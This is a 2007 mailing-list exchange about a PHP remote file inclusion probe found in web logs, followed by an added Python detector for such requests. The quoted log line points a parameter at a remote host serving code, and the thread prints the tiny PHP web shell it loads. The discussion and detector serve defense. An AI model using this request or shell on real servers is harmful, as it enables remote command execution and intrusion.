On Wednesday 25 April 2007 14:48, Marcus Meissner wrote:
> On Wed, Apr 25, 2007 at 01:45:34PM -0700, James D. Parra wrote:
> > Hello,
> >
> > I found these errors in our web logs and it appears that either
> > there is a PHP attack on the apache site or perhaps a kit on the
> > server?
> >
> > Errors below (profanity not mine);
> >
> >
> > 69.94.131.24 - - [02/Apr/2007:09:34:09 -0700] "GET
> > /components/com_forum/download.php?phpbb_root_path=http://203.198.6
> >8.236/~li sir/M.txt?&/ HTTP/1.1" 404 1046 "-" "Morfeus Fucking
> > Scanner"
>
> Looks like some kind of PHP include attack scanner, against lots of
> PHP apps.

It looks like an indirect injection exploit--getting the hacker's code 
to run in the environment of the server to which it is sent. Is PHP 
really so trusting as to load and execute remote code in the manner 
suggested by this attack?

Similar things are possible with database applications when the author 
naively uses string concatenation to combine template query fragments 
with user-supplied parameters.


> M.txt contains:
> <?
> system($_GET['cmd']);
> die ("Morfeus hacked you");
> ?>

Looks like:

a) Morfeus doesn't spell very well.
b) Morfeus knows only Windows.
c) Morfeus is kind of rude.


> ciao, Marcus


Randall Schulz
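
An added example, not part of the original messages: a log check for the request pattern discussed in this thread, flagging any request whose query string carries a parameter whose value is itself a URL. The sample log lines, addresses and user agent are constructed, and the function and field names are this example's own.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Apache combined format: host ident user [time] "request" status bytes "referer" "agent"
LOG_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) (?P<proto>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<agent>[^"]*)"$'
)
# A parameter value that is itself a URL is the remote-include pattern in the thread.
REMOTE_VALUE_RE = re.compile(r'^\s*(?:https?|ftp)://', re.IGNORECASE)

# Constructed sample lines (documentation address ranges, made-up user agent).
SAMPLE_LOG = [
    '192.0.2.10 - - [02/Apr/2007:09:34:09 -0700] "GET /components/com_forum/'
    'download.php?phpbb_root_path=http://198.51.100.7/~user/M.txt?&/ HTTP/1.1" '
    '404 1046 "-" "ExampleScanner"',
    '192.0.2.11 - - [02/Apr/2007:09:35:10 -0700] "GET /index.php?page='
    'http%3A%2F%2F198.51.100.7%2Fx.txt HTTP/1.1" 200 5120 "-" "ExampleScanner"',
    '192.0.2.12 - - [02/Apr/2007:09:36:00 -0700] "GET /search.php?q=php+include '
    'HTTP/1.1" 200 2048 "-" "Mozilla/5.0"',
]

def find_remote_include_attempts(lines):
    """Return one dict per request that has a URL-valued query parameter."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line.strip())
        if not m:
            continue  # not a combined-format line; skip rather than guess
        target = urlsplit(m["target"])
        # parse_qsl percent-decodes, so http%3A%2F%2F... is caught as well
        params = [name for name, value in parse_qsl(target.query, keep_blank_values=True)
                  if REMOTE_VALUE_RE.match(value)]
        if params:
            hits.append({
                "host": m["host"], "path": target.path, "params": params,
                "status": int(m["status"]), "agent": m["agent"],
                # 404 means the probed script is absent (as in the thread);
                # a 2xx means it exists and answered, so review that script.
                "served": m["status"].startswith("2"),
            })
    return hits

if __name__ == "__main__":
    for hit in find_remote_include_attempts(SAMPLE_LOG):
        print(hit)
```

Legitimate redirect or callback parameters also carry URLs, so treat hits as leads and rank those with `served` set first.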